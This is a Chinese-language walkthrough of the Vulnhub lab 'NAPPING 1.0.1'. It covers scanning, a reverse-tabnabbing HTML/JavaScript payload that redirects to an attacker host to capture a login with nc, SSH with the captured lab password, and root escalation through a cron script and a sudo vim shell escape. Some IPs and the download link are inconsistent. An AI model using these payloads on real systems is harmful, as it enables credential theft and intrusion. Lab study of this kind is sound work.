其他分享
首页 > 其他分享> > [Vulnhub] 靶场 NAPPING: 1.0.1

[Vulnhub] 靶场 NAPPING: 1.0.1

作者:互联网

前期准备

靶机下载地址:https://www.vulnhub.com/entry/red-1,753/
kali:192.168.147.178
靶机:192.168.147.185

一、信息收集

arp-scan -l
image

nmap -A -p 1-65535 192.168.11.137
nmap -sV -O 192.168.147.185 

image
发现80端口开启http服务,22端口开启ssh服务。

image
发现是个登陆界面,可以注册,我们先注册登陆。
image
完成注册后,登陆进入界面,发现界面中间有个输入链接的输入框。
image
随便输入一个进行测试,提交之后发现可以点击here。
image
点击here以后,发现跳到hao123主页。我们查看页面源代码。
image
查看源代码,发现站点上的此特定 URL 链接功能容易受到Tab Nabbing钓鱼攻击。

二、漏洞攻击

符合该漏洞利用条件,我们制作钓鱼页面,先将login登陆界面拷贝到本地。(注:为什么是拷贝index.php ,可以利用御剑扫描该网站,或者kali dirb http://192.168.147.185

image

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.147.178:8000/text1.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.178:8000/text1.html');
    </script>
</body>
</html>

image
开机8000端口监听,nc -lvvp 8000 之后,在进行下列步骤。
image
稍等几分钟之后会获取到监听信息,得到用户名和密码。
image
image

靶机中设定的隔几分钟就会用用户登录,此时我们获取了数据包
username=daniel
password=C@ughtm3napping123

三、ssh登陆

ssh daniel@192.168.147.785     #ssh登陆daniel尝试,发现登陆成功

image
查看用户信息:
可以看到 daniel 是管理员组的一部分。
使用 find 我们可以查找任何我们可以使用命令访问的有趣文件
find / -group administrators -type f 2>/dev/nul
image
进入目录查看query.py脚本内容,发现对访问本地服务状态进行录入,不管成功与否都写入site_status.txt文件。猜测是个定时脚本。
image
查看site_status.txt,发现可能是2分钟执行一次该脚本。
image

四、提权

image
在query.py中加入运行该脚本代码。
image
在攻击机监听1234端口,等会得到反弹shell。
image
发现可以再没有在没有密码的情况下以 root 身份运行 vim ,获取root权限,那就直接写入vim shell

sudo /usr/bin/vim -c ':!/bin/sh'  
sudo vim -c ':!/bin/sh'

两个命令都可以获取到root权限。
image
参考了我关注的博主。

标签:1.0,NAPPING,端口,192.168,window,html,Vulnhub,http,界面
来源: https://www.cnblogs.com/2022zzt/p/15979673.html